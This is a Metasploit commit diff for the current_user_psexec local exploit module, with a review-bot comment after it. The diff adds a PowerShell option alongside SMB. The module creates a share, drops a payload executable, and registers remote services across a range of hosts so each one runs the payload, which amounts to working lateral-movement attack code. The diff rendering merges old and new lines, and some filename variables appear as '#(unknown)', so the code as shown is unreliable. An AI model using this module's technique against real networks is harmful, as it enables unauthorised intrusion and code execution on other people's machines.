Land #2404 - Add powershell support for current_user_psexec

bug/bundler_fix
sinn3r 2013-09-20 17:14:55 -05:00
commit 8381bf8646
1 changed files with 43 additions and 29 deletions


@ -18,6 +18,7 @@ class Metasploit3 < Msf::Exploit::Local
include Post::Common include Post::Common
include Post::Windows::Services include Post::Windows::Services
include Exploit::EXE include Exploit::EXE
include Exploit::Powershell
include Post::File include Post::File
def initialize(info={}) def initialize(info={})
@ -44,6 +45,10 @@ class Metasploit3 < Msf::Exploit::Local
[ 'OSVDB', '3106'], [ 'OSVDB', '3106'],
[ 'URL', 'http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx' ] [ 'URL', 'http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx' ]
], ],
'DefaultOptions' =>
{
'WfsDelay' => 10,
},
'DisclosureDate' => 'Jan 01 1999', 'DisclosureDate' => 'Jan 01 1999',
'Platform' => [ 'win' ], 'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter' ], 'SessionTypes' => [ 'meterpreter' ],
@ -59,6 +64,7 @@ class Metasploit3 < Msf::Exploit::Local
]), ]),
OptString.new("NAME", [ false, "Service name on each target in RHOSTS (Default: random)" ]), OptString.new("NAME", [ false, "Service name on each target in RHOSTS (Default: random)" ]),
OptString.new("DISPNAME", [ false, "Service display name (Default: random)" ]), OptString.new("DISPNAME", [ false, "Service display name (Default: random)" ]),
OptEnum.new("TECHNIQUE", [ true, "Technique to use", 'SMB', ['PSH', 'SMB'] ]),
OptAddressRange.new("RHOSTS", [ false, "Target address range or CIDR identifier" ]), OptAddressRange.new("RHOSTS", [ false, "Target address range or CIDR identifier" ]),
]) ])
end end
@ -66,36 +72,39 @@ class Metasploit3 < Msf::Exploit::Local
def exploit def exploit
name = datastore["NAME"] || Rex::Text.rand_text_alphanumeric(10) name = datastore["NAME"] || Rex::Text.rand_text_alphanumeric(10)
display_name = datastore["DISPNAME"] || Rex::Text.rand_text_alphanumeric(10) display_name = datastore["DISPNAME"] || Rex::Text.rand_text_alphanumeric(10)
if datastore['TECHNIQUE'] == 'SMB'
# XXX Find the domain controller
# XXX Find the domain controller #share_host = datastore["INTERNAL_ADDRESS"] || detect_address
share_host = datastore["INTERNAL_ADDRESS"] || session.session_host
print_status "Using #{share_host} as the internal address for victims to get the payload from"
#share_host = datastore["INTERNAL_ADDRESS"] || detect_address # Build a random name for the share and directory
share_host = datastore["INTERNAL_ADDRESS"] || session.session_host share_name = Rex::Text.rand_text_alphanumeric(8)
print_status "Using #{share_host} as the internal address for victims to get the payload from" drive = session.fs.file.expand_path("%SYSTEMDRIVE%")
share_dir = "#{drive}\\#{share_name}"
# Build a random name for the share and directory # Create them
share_name = Rex::Text.rand_text_alphanumeric(8) print_status("Creating share #{share_dir}")
drive = session.fs.file.expand_path("%SYSTEMDRIVE%") session.fs.dir.mkdir(share_dir)
share_dir = "#{drive}\\#{share_name}" cmd_exec("net share #{share_name}=#{share_dir}")
# Create them # Generate an executable from the shellcode and drop it in the share
print_status("Creating share #{share_dir}") # directory
session.fs.dir.mkdir(share_dir) filename = "#{Rex::Text.rand_text_alphanumeric(8)}.exe"
cmd_exec("net share #{share_name}=#{share_dir}") payload_exe = generate_payload_exe_service(
:servicename => name,
# XXX Ghetto
:arch => payload.send(:pinst).arch.first
)
# Generate an executable from the shellcode and drop it in the share print_status("Dropping payload #(unknown)")
# directory write_file("#{share_dir}\\#(unknown)", payload_exe)
filename = "#{Rex::Text.rand_text_alphanumeric(8)}.exe"
payload_exe = generate_payload_exe_service(
:servicename => name,
# XXX Ghetto
:arch => payload.send(:pinst).arch.first
)
print_status("Dropping payload #(unknown)") service_executable = "\\\\#{share_host}\\#{share_name}\\#(unknown)"
write_file("#{share_dir}\\#(unknown)", payload_exe) else
service_executable = cmd_psh_payload(payload.encoded)
service_executable = "\\\\#{share_host}\\#{share_name}\\#(unknown)" end
begin begin
Rex::Socket::RangeWalker.new(datastore["RHOSTS"]).each do |server| Rex::Socket::RangeWalker.new(datastore["RHOSTS"]).each do |server|
@ -113,7 +122,10 @@ class Metasploit3 < Msf::Exploit::Local
print_status("#{server.ljust(16)} Deleting the service") print_status("#{server.ljust(16)} Deleting the service")
service_delete(name, server) service_delete(name, server)
rescue rescue Rex::TimeoutError
vprint_status("#{server.ljust(16)} Timed out...")
next
rescue RuntimeError, ::Rex::Post::Meterpreter::RequestError
print_error("Exception running payload: #{$!.class} : #{$!}") print_error("Exception running payload: #{$!.class} : #{$!}")
print_warning("#{server.ljust(16)} WARNING: May have failed to clean up!") print_warning("#{server.ljust(16)} WARNING: May have failed to clean up!")
print_warning("#{server.ljust(16)} Try a command like: sc \\\\#{server}\\ delete #{name}") print_warning("#{server.ljust(16)} Try a command like: sc \\\\#{server}\\ delete #{name}")
@ -121,10 +133,12 @@ class Metasploit3 < Msf::Exploit::Local
end end
end end
ensure ensure
print_status("Deleting share #{share_name}") if datastore['TECHNIQUE'] == 'SMB'
cmd_exec("net share #{share_name} /delete /y") print_status("Deleting share #{share_name}")
print_status("Deleting files #{share_dir}") cmd_exec("net share #{share_name} /delete /y")
cmd_exec("cmd /c rmdir /q /s #{share_dir}") print_status("Deleting files #{share_dir}")
cmd_exec("cmd /c rmdir /q /s #{share_dir}")
end
end end
end end
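Review bot: The new `rescue Rex::TimeoutError` branch does `next` without any cleanup attempt or warning, so a target that times out after `service_create` has succeeded is left with the service (and, for the SMB technique, the UNC binary path pointing at the operator's share) registered but never deleted; the `RuntimeError`/`RequestError` branch right below it at least prints the "May have failed to clean up" warning and the `sc \\host delete` hint, and the timeout path should do the same, e.g. `vprint_status("#{server.ljust(16)} Timed out...")` followed by `print_warning("#{server.ljust(16)} WARNING: May have failed to clean up! Try: sc \\\\#{server}\\ delete #{name}")`, or a best-effort `service_delete(name, server) rescue nil` before `next`. Narrowing the old bare `rescue` to `RuntimeError, ::Rex::Post::Meterpreter::RequestError` also means any other StandardError from one host now escapes the per-host block and aborts the whole RHOSTS sweep (the outer `ensure` still runs), which may be intended but deserves a comment. For the PSH branch, it would help to note next to `service_executable = cmd_psh_payload(payload.encoded)` that the service binary is a powershell.exe command line rather than a real SCM-aware service, which presumably is why `WfsDelay` is raised to 10 — confirm and document that assumption. The enclosing `exploit` method starts and ends outside this hunk.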